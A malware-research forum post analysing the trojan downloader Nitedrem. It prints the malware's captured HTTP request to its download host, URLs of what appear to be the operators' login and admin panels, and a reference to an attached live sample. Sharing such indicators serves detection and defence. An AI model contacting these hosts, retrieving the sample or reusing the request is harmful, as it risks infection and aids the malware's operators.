TrojanDownloader:Win32/Nitedrem.D ( MS Name)

Re: TrojanDownloader:Win32/Nitedrem.D ( MS Name)

#23354 by Xylitol
Mon Jul 14, 2014 10:58 am

I've only found Nitedrem.A related to the same host that Micosoft talk about.

GET /down.asp?action=install&u=xiaoyao&p=AA6FF431A49443538BEA73E71227F111&t=4662 HTTP/1.1
User-Agent: fucking
Host: bucks.onepiecedream.com:99

HTTP/1.1 200 OK
Date: Sun, 07 Jul 2013 18:31:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDDCRCT=DEJAAENAIJLLODIDJAADFPNF; path=/
Cache-control: private

https://www.virustotal.com/en/file/ef24 ... 405335315/
Apparently it's distributed from an affiliate ?

Code: Select all

http://bucks.onepiecedream.com/index.asp?page=Login
http://bucks.onepiecedream.com:99/admin/qinshou.asp

Attachments

Nitedrem.A.zip

infected
(151.75 KiB) Downloaded 56 times

Registration Problems and FAQ - Rules For Malware Requests

Username

Xylitol

Rank

Global Moderator

Posts

1706

Joined

Sat Apr 10, 2010 5:54 pm

Location

Seireitei, Soul Society

Contact